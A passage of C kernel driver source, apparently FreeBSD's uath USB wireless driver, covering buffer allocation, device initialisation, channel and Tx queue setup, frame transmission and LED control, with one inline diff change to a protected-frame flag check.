struct uath_data *dp = &data[i]; if (fillmbuf == 1) { if (dp->m != NULL) { m_freem(dp->m); dp->m = NULL; dp->buf = NULL; } } else { dp->buf = NULL; } if (dp->ni != NULL) { ieee80211_free_node(dp->ni); dp->ni = NULL; } } } static int uath_alloc_data_list(struct uath_softc *sc, struct uath_data data[], int ndata, int maxsz, void *dma_buf) { int i, error; for (i = 0; i < ndata; i++) { struct uath_data *dp = &data[i]; dp->sc = sc; if (dma_buf == NULL) { /* XXX check maxsz */ dp->m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (dp->m == NULL) { device_printf(sc->sc_dev, "could not allocate rx mbuf\n"); error = ENOMEM; goto fail; } dp->buf = mtod(dp->m, uint8_t *); } else { dp->m = NULL; dp->buf = ((uint8_t *)dma_buf) + (i * maxsz); } dp->ni = NULL; } return (0); fail: uath_free_data_list(sc, data, ndata, 1 /* free mbufs */); return (error); } static int uath_alloc_rx_data_list(struct uath_softc *sc) { int error, i; /* XXX is it enough to store the RX packet with MCLBYTES bytes? */ error = uath_alloc_data_list(sc, sc->sc_rx, UATH_RX_DATA_LIST_COUNT, MCLBYTES, NULL /* setup mbufs */); if (error != 0) return (error); STAILQ_INIT(&sc->sc_rx_active); STAILQ_INIT(&sc->sc_rx_inactive); for (i = 0; i < UATH_RX_DATA_LIST_COUNT; i++) { STAILQ_INSERT_HEAD(&sc->sc_rx_inactive, &sc->sc_rx[i], next); UATH_STAT_INC(sc, st_rx_inactive); } return (0); } static int uath_alloc_tx_data_list(struct uath_softc *sc) { int error, i; error = uath_alloc_data_list(sc, sc->sc_tx, UATH_TX_DATA_LIST_COUNT, UATH_MAX_TXBUFSZ, sc->sc_tx_dma_buf); if (error != 0) return (error); STAILQ_INIT(&sc->sc_tx_active); STAILQ_INIT(&sc->sc_tx_inactive); STAILQ_INIT(&sc->sc_tx_pending); for (i = 0; i < UATH_TX_DATA_LIST_COUNT; i++) { STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, &sc->sc_tx[i], next); UATH_STAT_INC(sc, st_tx_inactive); } return (0); } static void uath_free_rx_data_list(struct uath_softc *sc) { uath_free_data_list(sc, sc->sc_rx, UATH_RX_DATA_LIST_COUNT, 1 /* free mbufs */); } static void uath_free_tx_data_list(struct uath_softc *sc) { uath_free_data_list(sc, sc->sc_tx, UATH_TX_DATA_LIST_COUNT, 0 /* no mbufs */); } static struct ieee80211vap * uath_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct uath_vap *uvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return (NULL); uvp = (struct uath_vap *) malloc(sizeof(struct uath_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (uvp == NULL) return (NULL); vap = &uvp->vap; /* enable s/w bmiss handling for sta mode */ if (ieee80211_vap_setup(ic, vap, name, unit, opmode, flags | IEEE80211_CLONE_NOBEACONS, bssid, mac) != 0) { /* out of memory */ free(uvp, M_80211_VAP); return (NULL); } /* override state transition machine */ uvp->newstate = vap->iv_newstate; vap->iv_newstate = uath_newstate; /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return (vap); } static void uath_vap_delete(struct ieee80211vap *vap) { struct uath_vap *uvp = UATH_VAP(vap); ieee80211_vap_detach(vap); free(uvp, M_80211_VAP); } static int uath_init_locked(void *arg) { struct uath_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t val; int error; UATH_ASSERT_LOCKED(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) uath_stop_locked(ifp); /* reset variables */ sc->sc_intrx_nextnum = sc->sc_msgid = 0; val = htobe32(0); 
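/* issue the BIND command with a zero argument before configuring the device */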
uath_cmd_write(sc, WDCMSG_BIND, &val, sizeof val, 0); /* set MAC address */ uath_config_multi(sc, CFG_MAC_ADDR, IF_LLADDR(ifp), IEEE80211_ADDR_LEN); /* XXX honor net80211 state */ uath_config(sc, CFG_RATE_CONTROL_ENABLE, 0x00000001); uath_config(sc, CFG_DIVERSITY_CTL, 0x00000001); uath_config(sc, CFG_ABOLT, 0x0000003f); uath_config(sc, CFG_WME_ENABLED, 0x00000001); uath_config(sc, CFG_SERVICE_TYPE, 1); uath_config(sc, CFG_TP_SCALE, 0x00000000); uath_config(sc, CFG_TPC_HALF_DBM5, 0x0000003c); uath_config(sc, CFG_TPC_HALF_DBM2, 0x0000003c); uath_config(sc, CFG_OVERRD_TX_POWER, 0x00000000); uath_config(sc, CFG_GMODE_PROTECTION, 0x00000000); uath_config(sc, CFG_GMODE_PROTECT_RATE_INDEX, 0x00000003); uath_config(sc, CFG_PROTECTION_TYPE, 0x00000000); uath_config(sc, CFG_MODE_CTS, 0x00000002); error = uath_cmd_read(sc, WDCMSG_TARGET_START, NULL, 0, &val, sizeof(val), UATH_CMD_FLAG_MAGIC); if (error) { device_printf(sc->sc_dev, "could not start target, error %d\n", error); goto fail; } DPRINTF(sc, UATH_DEBUG_INIT, "%s returns handle: 0x%x\n", uath_codename(WDCMSG_TARGET_START), be32toh(val)); /* set default channel */ error = uath_switch_channel(sc, ic->ic_curchan); if (error) { device_printf(sc->sc_dev, "could not switch channel, error %d\n", error); goto fail; } val = htobe32(TARGET_DEVICE_AWAKE); uath_cmd_write(sc, WDCMSG_SET_PWR_MODE, &val, sizeof val, 0); /* XXX? check */ uath_cmd_write(sc, WDCMSG_RESET_KEY_CACHE, NULL, 0, 0); usbd_transfer_start(sc->sc_xfer[UATH_BULK_RX]); /* enable Rx */ uath_set_rxfilter(sc, 0x0, UATH_FILTER_OP_INIT); uath_set_rxfilter(sc, UATH_FILTER_RX_UCAST | UATH_FILTER_RX_MCAST | UATH_FILTER_RX_BCAST | UATH_FILTER_RX_BEACON, UATH_FILTER_OP_SET); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; sc->sc_flags |= UATH_FLAG_INITDONE; callout_reset(&sc->watchdog_ch, hz, uath_watchdog, sc); return (0); fail: uath_stop_locked(ifp); return (error); } static void uath_init(void *arg) { struct uath_softc *sc = arg; UATH_LOCK(sc); (void)uath_init_locked(sc); UATH_UNLOCK(sc); } static void uath_stop_locked(struct ifnet *ifp) { struct uath_softc *sc = ifp->if_softc; UATH_ASSERT_LOCKED(sc); ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); sc->sc_flags &= ~UATH_FLAG_INITDONE; callout_stop(&sc->stat_ch); callout_stop(&sc->watchdog_ch); sc->sc_tx_timer = 0; /* abort pending transmits */ uath_abort_xfers(sc); /* flush data & control requests into the target */ (void)uath_flush(sc); /* set a LED status to the disconnected. */ uath_set_ledstate(sc, 0); /* stop the target */ uath_cmd_write(sc, WDCMSG_TARGET_STOP, NULL, 0, 0); } static void uath_stop(struct ifnet *ifp) { struct uath_softc *sc = ifp->if_softc; UATH_LOCK(sc); uath_stop_locked(ifp); UATH_UNLOCK(sc); } static int uath_config(struct uath_softc *sc, uint32_t reg, uint32_t val) { struct uath_write_mac write; int error; write.reg = htobe32(reg); write.len = htobe32(0); /* 0 = single write */ *(uint32_t *)write.data = htobe32(val); error = uath_cmd_write(sc, WDCMSG_TARGET_SET_CONFIG, &write, 3 * sizeof (uint32_t), 0); if (error != 0) { device_printf(sc->sc_dev, "could not write register 0x%02x\n", reg); } return (error); } static int uath_config_multi(struct uath_softc *sc, uint32_t reg, const void *data, int len) { struct uath_write_mac write; int error; write.reg = htobe32(reg); write.len = htobe32(len); bcopy(data, write.data, len); /* properly handle the case where len is zero (reset) */ error = uath_cmd_write(sc, WDCMSG_TARGET_SET_CONFIG, &write, (len == 0) ? 
sizeof (uint32_t) : 2 * sizeof (uint32_t) + len, 0); if (error != 0) { device_printf(sc->sc_dev, "could not write %d bytes to register 0x%02x\n", len, reg); } return (error); } static int uath_switch_channel(struct uath_softc *sc, struct ieee80211_channel *c) { int error; UATH_ASSERT_LOCKED(sc); /* set radio frequency */ error = uath_set_chan(sc, c); if (error) { device_printf(sc->sc_dev, "could not set channel, error %d\n", error); goto failed; } /* reset Tx rings */ error = uath_reset_tx_queues(sc); if (error) { device_printf(sc->sc_dev, "could not reset Tx queues, error %d\n", error); goto failed; } /* set Tx rings WME properties */ error = uath_wme_init(sc); if (error) { device_printf(sc->sc_dev, "could not init Tx queues, error %d\n", error); goto failed; } error = uath_set_ledstate(sc, 0); if (error) { device_printf(sc->sc_dev, "could not set led state, error %d\n", error); goto failed; } error = uath_flush(sc); if (error) { device_printf(sc->sc_dev, "could not flush pipes, error %d\n", error); goto failed; } failed: return (error); } static int uath_set_rxfilter(struct uath_softc *sc, uint32_t bits, uint32_t op) { struct uath_cmd_rx_filter rxfilter; rxfilter.bits = htobe32(bits); rxfilter.op = htobe32(op); DPRINTF(sc, UATH_DEBUG_RECV | UATH_DEBUG_RECV_ALL, "setting Rx filter=0x%x flags=0x%x\n", bits, op); return uath_cmd_write(sc, WDCMSG_RX_FILTER, &rxfilter, sizeof rxfilter, 0); } static void uath_watchdog(void *arg) { struct uath_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; if (sc->sc_tx_timer > 0) { if (--sc->sc_tx_timer == 0) { device_printf(sc->sc_dev, "device timeout\n"); /*uath_init(ifp); XXX needs a process context! */ ifp->if_oerrors++; return; } callout_reset(&sc->watchdog_ch, hz, uath_watchdog, sc); } } static void uath_abort_xfers(struct uath_softc *sc) { int i; UATH_ASSERT_LOCKED(sc); /* abort any pending transfers */ for (i = 0; i < UATH_N_XFERS; i++) usbd_transfer_stop(sc->sc_xfer[i]); } static int uath_flush(struct uath_softc *sc) { int error; error = uath_dataflush(sc); if (error != 0) goto failed; error = uath_cmdflush(sc); if (error != 0) goto failed; failed: return (error); } static int uath_cmdflush(struct uath_softc *sc) { return uath_cmd_write(sc, WDCMSG_FLUSH, NULL, 0, 0); } static int uath_dataflush(struct uath_softc *sc) { struct uath_data *data; struct uath_chunk *chunk; struct uath_tx_desc *desc; UATH_ASSERT_LOCKED(sc); data = uath_getbuf(sc); if (data == NULL) return (ENOBUFS); data->buflen = sizeof(struct uath_chunk) + sizeof(struct uath_tx_desc); data->m = NULL; data->ni = NULL; chunk = (struct uath_chunk *)data->buf; desc = (struct uath_tx_desc *)(chunk + 1); /* one chunk only */ chunk->seqnum = 0; chunk->flags = UATH_CFLAGS_FINAL; chunk->length = htobe16(sizeof (struct uath_tx_desc)); memset(desc, 0, sizeof(struct uath_tx_desc)); desc->msglen = htobe32(sizeof(struct uath_tx_desc)); desc->msgid = (sc->sc_msgid++) + 1; /* don't care about endianness */ desc->type = htobe32(WDCMSG_FLUSH); desc->txqid = htobe32(0); desc->connid = htobe32(0); desc->flags = htobe32(0); #ifdef UATH_DEBUG if (sc->sc_debug & UATH_DEBUG_CMDS) { DPRINTF(sc, UATH_DEBUG_RESET, "send flush ix %d\n", desc->msgid); if (sc->sc_debug & UATH_DEBUG_CMDS_DUMP) uath_dump_cmd(data->buf, data->buflen, '+'); } #endif STAILQ_INSERT_TAIL(&sc->sc_tx_pending, data, next); UATH_STAT_INC(sc, st_tx_pending); sc->sc_tx_timer = 5; usbd_transfer_start(sc->sc_xfer[UATH_BULK_TX]); return (0); } static struct uath_data * _uath_getbuf(struct uath_softc *sc) { struct uath_data *bf; bf = 
STAILQ_FIRST(&sc->sc_tx_inactive); if (bf != NULL) { STAILQ_REMOVE_HEAD(&sc->sc_tx_inactive, next); UATH_STAT_DEC(sc, st_tx_inactive); } else bf = NULL; if (bf == NULL) DPRINTF(sc, UATH_DEBUG_XMIT, "%s: %s\n", __func__, "out of xmit buffers"); return (bf); } static struct uath_data * uath_getbuf(struct uath_softc *sc) { struct uath_data *bf; UATH_ASSERT_LOCKED(sc); bf = _uath_getbuf(sc); if (bf == NULL) { struct ifnet *ifp = sc->sc_ifp; DPRINTF(sc, UATH_DEBUG_XMIT, "%s: stop queue\n", __func__); ifp->if_drv_flags |= IFF_DRV_OACTIVE; } return (bf); } static int uath_set_ledstate(struct uath_softc *sc, int connected) { DPRINTF(sc, UATH_DEBUG_LED, "set led state %sconnected\n", connected ? "" : "!"); connected = htobe32(connected); return uath_cmd_write(sc, WDCMSG_SET_LED_STATE, &connected, sizeof connected, 0); } static int uath_set_chan(struct uath_softc *sc, struct ieee80211_channel *c) { #ifdef UATH_DEBUG struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; #endif struct uath_cmd_reset reset; memset(&reset, 0, sizeof(reset)); if (IEEE80211_IS_CHAN_2GHZ(c)) reset.flags |= htobe32(UATH_CHAN_2GHZ); if (IEEE80211_IS_CHAN_5GHZ(c)) reset.flags |= htobe32(UATH_CHAN_5GHZ); /* NB: 11g =>'s 11b so don't specify both OFDM and CCK */ if (IEEE80211_IS_CHAN_OFDM(c)) reset.flags |= htobe32(UATH_CHAN_OFDM); else if (IEEE80211_IS_CHAN_CCK(c)) reset.flags |= htobe32(UATH_CHAN_CCK); /* turbo can be used in either 2GHz or 5GHz */ if (c->ic_flags & IEEE80211_CHAN_TURBO) reset.flags |= htobe32(UATH_CHAN_TURBO); reset.freq = htobe32(c->ic_freq); reset.maxrdpower = htobe32(50); /* XXX */ reset.channelchange = htobe32(1); reset.keeprccontent = htobe32(0); DPRINTF(sc, UATH_DEBUG_CHANNEL, "set channel %d, flags 0x%x freq %u\n", ieee80211_chan2ieee(ic, c), be32toh(reset.flags), be32toh(reset.freq)); return uath_cmd_write(sc, WDCMSG_RESET, &reset, sizeof reset, 0); } static int uath_reset_tx_queues(struct uath_softc *sc) { int ac, error; DPRINTF(sc, UATH_DEBUG_RESET, "%s: reset Tx queues\n", __func__); for (ac = 0; ac < 4; ac++) { const uint32_t qid = htobe32(ac); error = uath_cmd_write(sc, WDCMSG_RELEASE_TX_QUEUE, &qid, sizeof qid, 0); if (error != 0) break; } return (error); } static int uath_wme_init(struct uath_softc *sc) { /* XXX get from net80211 */ static const struct uath_wme_settings uath_wme_11g[4] = { { 7, 4, 10, 0, 0 }, /* Background */ { 3, 4, 10, 0, 0 }, /* Best-Effort */ { 3, 3, 4, 26, 0 }, /* Video */ { 2, 2, 3, 47, 0 } /* Voice */ }; struct uath_cmd_txq_setup qinfo; int ac, error; DPRINTF(sc, UATH_DEBUG_WME, "%s: setup Tx queues\n", __func__); for (ac = 0; ac < 4; ac++) { qinfo.qid = htobe32(ac); qinfo.len = htobe32(sizeof(qinfo.attr)); qinfo.attr.priority = htobe32(ac); /* XXX */ qinfo.attr.aifs = htobe32(uath_wme_11g[ac].aifsn); qinfo.attr.logcwmin = htobe32(uath_wme_11g[ac].logcwmin); qinfo.attr.logcwmax = htobe32(uath_wme_11g[ac].logcwmax); qinfo.attr.bursttime = htobe32(UATH_TXOP_TO_US( uath_wme_11g[ac].txop)); qinfo.attr.mode = htobe32(uath_wme_11g[ac].acm);/*XXX? */ qinfo.attr.qflags = htobe32(1); /* XXX? */ error = uath_cmd_write(sc, WDCMSG_SETUP_TX_QUEUE, &qinfo, sizeof qinfo, 0); if (error != 0) break; } return (error); } static int uath_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; struct uath_softc *sc = ifp->if_softc; int error; int startall = 0; UATH_LOCK(sc); error = (sc->sc_flags & UATH_FLAG_INVALID) ? 
ENXIO : 0; UATH_UNLOCK(sc); if (error) return (error); switch (cmd) { case SIOCSIFFLAGS: if (ifp->if_flags & IFF_UP) { if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { uath_init(ifp->if_softc); startall = 1; } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) uath_stop(ifp); } if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return (error); } static int uath_tx_start(struct uath_softc *sc, struct mbuf *m0, struct ieee80211_node *ni, struct uath_data *data) { struct ieee80211vap *vap = ni->ni_vap; struct uath_chunk *chunk; struct uath_tx_desc *desc; const struct ieee80211_frame *wh; struct ieee80211_key *k; int framelen, msglen; UATH_ASSERT_LOCKED(sc); data->ni = ni; data->m = m0; chunk = (struct uath_chunk *)data->buf; desc = (struct uath_tx_desc *)(chunk + 1); if (ieee80211_radiotap_active_vap(vap)) { struct uath_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; if (m0->m_flags & M_FRAG) tap->wt_flags |= IEEE80211_RADIOTAP_F_FRAG; ieee80211_radiotap_tx(vap, m0); } wh = mtod(m0, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return (ENOBUFS); } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } m_copydata(m0, 0, m0->m_pkthdr.len, (uint8_t *)(desc + 1)); framelen = m0->m_pkthdr.len + IEEE80211_CRC_LEN; msglen = framelen + sizeof (struct uath_tx_desc); data->buflen = msglen + sizeof (struct uath_chunk); /* one chunk only for now */ chunk->seqnum = sc->sc_seqnum++; chunk->flags = (m0->m_flags & M_FRAG) ? 
0 : UATH_CFLAGS_FINAL; if (m0->m_flags & M_LASTFRAG) chunk->flags |= UATH_CFLAGS_FINAL; chunk->flags = UATH_CFLAGS_FINAL; chunk->length = htobe16(msglen); /* fill Tx descriptor */ desc->msglen = htobe32(msglen); /* NB: to get UATH_TX_NOTIFY reply, `msgid' must be larger than 0 */ desc->msgid = (sc->sc_msgid++) + 1; /* don't care about endianness */ desc->type = htobe32(WDCMSG_SEND); switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { case IEEE80211_FC0_TYPE_CTL: case IEEE80211_FC0_TYPE_MGT: /* NB: force all management frames to highest queue */ if (ni->ni_flags & IEEE80211_NODE_QOS) { /* NB: force all management frames to highest queue */ desc->txqid = htobe32(WME_AC_VO | UATH_TXQID_MINRATE); } else desc->txqid = htobe32(WME_AC_BE | UATH_TXQID_MINRATE); break; case IEEE80211_FC0_TYPE_DATA: /* XXX multicast frames should honor mcastrate */ desc->txqid = htobe32(M_WME_GETAC(m0)); break; default: device_printf(sc->sc_dev, "bogus frame type 0x%x (%s)\n", wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK, __func__); m_freem(m0); return (EIO); } if (vap->iv_state == IEEE80211_S_AUTH || vap->iv_state == IEEE80211_S_ASSOC || vap->iv_state == IEEE80211_S_RUN) desc->connid = htobe32(UATH_ID_BSS); else desc->connid = htobe32(UATH_ID_INVALID); desc->flags = htobe32(0 /* no UATH_TX_NOTIFY */); desc->buflen = htobe32(m0->m_pkthdr.len); #ifdef UATH_DEBUG DPRINTF(sc, UATH_DEBUG_XMIT, "send frame ix %u framelen %d msglen %d connid 0x%x txqid 0x%x\n", desc->msgid, framelen, msglen, be32toh(desc->connid), be32toh(desc->txqid)); if (sc->sc_debug & UATH_DEBUG_XMIT_DUMP) uath_dump_cmd(data->buf, data->buflen, '+'); #endif STAILQ_INSERT_TAIL(&sc->sc_tx_pending, data, next); UATH_STAT_INC(sc, st_tx_pending); usbd_transfer_start(sc->sc_xfer[UATH_BULK_TX]); return (0); } /* * Cleanup driver resources when we run out of buffers while processing * fragments; return the tx buffers allocated and drop node references. */ static void uath_txfrag_cleanup(struct uath_softc *sc, uath_datahead *frags, struct ieee80211_node *ni) { struct uath_data *bf, *next; UATH_ASSERT_LOCKED(sc); STAILQ_FOREACH_SAFE(bf, frags, next, next) { /* NB: bf assumed clean */ STAILQ_REMOVE_HEAD(frags, next); STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); UATH_STAT_INC(sc, st_tx_inactive); ieee80211_node_decref(ni); } } /* * Setup xmit of a fragmented frame. Allocate a buffer for each frag and bump * the node reference count to reflect the held reference to be setup by * uath_tx_start. */ static int uath_txfrag_setup(struct uath_softc *sc, uath_datahead *frags, struct mbuf *m0, struct ieee80211_node *ni) { struct mbuf *m; struct uath_data *bf; UATH_ASSERT_LOCKED(sc); for (m = m0->m_nextpkt; m != NULL; m = m->m_nextpkt) { bf = uath_getbuf(sc); if (bf == NULL) { /* out of buffers, cleanup */ uath_txfrag_cleanup(sc, frags, ni); break; } ieee80211_node_incref(ni); STAILQ_INSERT_TAIL(frags, bf, next); } return !STAILQ_EMPTY(frags); } /* * Reclaim mbuf resources. For fragmented frames we need to claim each frag * chained with m_nextpkt. 
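* (uath_freetx() below simply walks the m_nextpkt chain and m_freem()s each fragment.)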
*/ static void uath_freetx(struct mbuf *m) { struct mbuf *next; do { next = m->m_nextpkt; m->m_nextpkt = NULL; m_freem(m); } while ((m = next) != NULL); } static void uath_start(struct ifnet *ifp) { struct uath_data *bf; struct uath_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m, *next; uath_datahead frags; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || (sc->sc_flags & UATH_FLAG_INVALID)) return; UATH_LOCK(sc); for (;;) { bf = uath_getbuf(sc); if (bf == NULL) break; IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) { STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); UATH_STAT_INC(sc, st_tx_inactive); break; } ni = (struct ieee80211_node *)m->m_pkthdr.rcvif; m->m_pkthdr.rcvif = NULL; /* * Check for fragmentation. If this frame has been broken up * verify we have enough buffers to send all the fragments * so all go out or none... */ STAILQ_INIT(&frags); if ((m->m_flags & M_FRAG) && !uath_txfrag_setup(sc, &frags, m, ni)) { DPRINTF(sc, UATH_DEBUG_XMIT, "%s: out of txfrag buffers\n", __func__); uath_freetx(m); goto bad; } sc->sc_seqnum = 0; nextfrag: /* * Pass the frame to the h/w for transmission. * Fragmented frames have each frag chained together * with m_nextpkt. We know there are sufficient uath_data's * to send all the frags because of work done by * uath_txfrag_setup. */ next = m->m_nextpkt; if (uath_tx_start(sc, m, ni, bf) != 0) { bad: ifp->if_oerrors++; reclaim: STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); UATH_STAT_INC(sc, st_tx_inactive); uath_txfrag_cleanup(sc, &frags, ni); ieee80211_free_node(ni); continue; } if (next != NULL) { /* * Beware of state changing between frags. XXX check sta power-save state? */ if (ni->ni_vap->iv_state != IEEE80211_S_RUN) { DPRINTF(sc, UATH_DEBUG_XMIT, "%s: flush fragmented packet, state %s\n", __func__, ieee80211_state_name[ni->ni_vap->iv_state]); uath_freetx(next); goto reclaim; } m = next; bf = STAILQ_FIRST(&frags); KASSERT(bf != NULL, ("no buf for txfrag")); STAILQ_REMOVE_HEAD(&frags, next); goto nextfrag; } sc->sc_tx_timer = 5; } UATH_UNLOCK(sc); } static int uath_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct uath_data *bf; struct uath_softc *sc = ifp->if_softc; /* prevent management frames from being sent if we're not ready */ if ((sc->sc_flags & UATH_FLAG_INVALID) || !(ifp->if_drv_flags & IFF_DRV_RUNNING)) { m_freem(m); ieee80211_free_node(ni); return (ENETDOWN); } UATH_LOCK(sc); /* grab a TX buffer */ bf = uath_getbuf(sc); if (bf == NULL) { ieee80211_free_node(ni); m_freem(m); UATH_UNLOCK(sc); return (ENOBUFS); } sc->sc_seqnum = 0; if (uath_tx_start(sc, m, ni, bf) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); UATH_STAT_INC(sc, st_tx_inactive); UATH_UNLOCK(sc); return (EIO); } UATH_UNLOCK(sc); sc->sc_tx_timer = 5; return (0); } static void uath_scan_start(struct ieee80211com *ic) { /* do nothing */ } static void uath_scan_end(struct ieee80211com *ic) { /* do nothing */ } static void uath_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct uath_softc *sc = ifp->if_softc; UATH_LOCK(sc); if ((sc->sc_flags & UATH_FLAG_INVALID) || (ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { UATH_UNLOCK(sc); return; } (void)uath_switch_channel(sc, ic->ic_curchan); UATH_UNLOCK(sc); } static int uath_set_rxmulti_filter(struct uath_softc *sc) { /* XXX broken */ return (0); } static void uath_update_mcast(struct ifnet *ifp) { struct 
uath_softc *sc = ifp->if_softc; UATH_LOCK(sc); if ((sc->sc_flags & UATH_FLAG_INVALID) || (ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { UATH_UNLOCK(sc); return; } /* * this is for avoiding the race condition when we're try to * connect to the AP with WPA. */ if (sc->sc_flags & UATH_FLAG_INITDONE) (void)uath_set_rxmulti_filter(sc); UATH_UNLOCK(sc); } static void uath_update_promisc(struct ifnet *ifp) { struct uath_softc *sc = ifp->if_softc; UATH_LOCK(sc); if ((sc->sc_flags & UATH_FLAG_INVALID) || (ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { UATH_UNLOCK(sc); return; } if (sc->sc_flags & UATH_FLAG_INITDONE) { uath_set_rxfilter(sc, UATH_FILTER_RX_UCAST | UATH_FILTER_RX_MCAST | UATH_FILTER_RX_BCAST | UATH_FILTER_RX_BEACON | UATH_FILTER_RX_PROM, UATH_FILTER_OP_SET); } UATH_UNLOCK(sc); } static int uath_create_connection(struct uath_softc *sc, uint32_t connid) { const struct ieee80211_rateset *rs; struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ieee80211_node *ni; struct uath_cmd_create_connection create; ni = ieee80211_ref_node(vap->iv_bss); memset(&create, 0, sizeof(create)); create.connid = htobe32(connid); create.bssid = htobe32(0); /* XXX packed or not? */ create.size = htobe32(sizeof(struct uath_cmd_rateset)); rs = &ni->ni_rates; create.connattr.rateset.length = rs->rs_nrates; bcopy(rs->rs_rates, &create.connattr.rateset.set[0], rs->rs_nrates); /* XXX turbo */ if (IEEE80211_IS_CHAN_A(ni->ni_chan)) create.connattr.wlanmode = htobe32(WLAN_MODE_11a); else if (IEEE80211_IS_CHAN_ANYG(ni->ni_chan)) create.connattr.wlanmode = htobe32(WLAN_MODE_11g); else create.connattr.wlanmode = htobe32(WLAN_MODE_11b); ieee80211_free_node(ni); return uath_cmd_write(sc, WDCMSG_CREATE_CONNECTION, &create, sizeof create, 0); } static int uath_set_rates(struct uath_softc *sc, const struct ieee80211_rateset *rs) { struct uath_cmd_rates rates; memset(&rates, 0, sizeof(rates)); rates.connid = htobe32(UATH_ID_BSS); /* XXX */ rates.size = htobe32(sizeof(struct uath_cmd_rateset)); /* XXX bounds check rs->rs_nrates */ rates.rateset.length = rs->rs_nrates; bcopy(rs->rs_rates, &rates.rateset.set[0], rs->rs_nrates); DPRINTF(sc, UATH_DEBUG_RATES, "setting supported rates nrates=%d\n", rs->rs_nrates); return uath_cmd_write(sc, WDCMSG_SET_BASIC_RATE, &rates, sizeof rates, 0); } static int uath_write_associd(struct uath_softc *sc) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ieee80211_node *ni; struct uath_cmd_set_associd associd; ni = ieee80211_ref_node(vap->iv_bss); memset(&associd, 0, sizeof(associd)); associd.defaultrateix = htobe32(1); /* XXX */ associd.associd = htobe32(ni->ni_associd); associd.timoffset = htobe32(0x3b); /* XXX */ IEEE80211_ADDR_COPY(associd.bssid, ni->ni_bssid); ieee80211_free_node(ni); return uath_cmd_write(sc, WDCMSG_WRITE_ASSOCID, &associd, sizeof associd, 0); } static int uath_set_ledsteady(struct uath_softc *sc, int lednum, int ledmode) { struct uath_cmd_ledsteady led; led.lednum = htobe32(lednum); led.ledmode = htobe32(ledmode); DPRINTF(sc, UATH_DEBUG_LED, "set %s led %s (steady)\n", (lednum == UATH_LED_LINK) ? "link" : "activity", ledmode ? 
"on" : "off"); return uath_cmd_write(sc, WDCMSG_SET_LED_STEADY, &led, sizeof led, 0); } static int uath_set_ledblink(struct uath_softc *sc, int lednum, int ledmode, int blinkrate, int slowmode) { struct uath_cmd_ledblink led; led.lednum = htobe32(lednum); led.ledmode = htobe32(ledmode); led.blinkrate = htobe32(blinkrate); led.slowmode = htobe32(slowmode); DPRINTF(sc, UATH_DEBUG_LED, "set %s led %s (blink)\n", (lednum == UATH_LED_LINK) ? "link" : "activity", ledmode ? "on" : "off"); return uath_cmd_write(sc, WDCMSG_SET_LED_BLINK, &led, sizeof led, 0); } static int uath_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { enum ieee80211_state ostate = vap->iv_state; int error; struct ieee80211_node *ni; struct ieee80211com *ic = vap->iv_ic; struct uath_softc *sc = ic->ic_ifp->if_softc; struct uath_vap *uvp = UATH_VAP(vap); DPRINTF(sc, UATH_DEBUG_STATE, "%s: %s -> %s\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate]); IEEE80211_UNLOCK(ic); UATH_LOCK(sc); callout_stop(&sc->stat_ch); callout_stop(&sc->watchdog_ch); ni = ieee80211_ref_node(vap->iv_bss); switch (nstate) { case IEEE80211_S_INIT: if (ostate == IEEE80211_S_RUN) { /* turn link and activity LEDs off */ uath_set_ledstate(sc, 0); } break; case IEEE80211_S_SCAN: 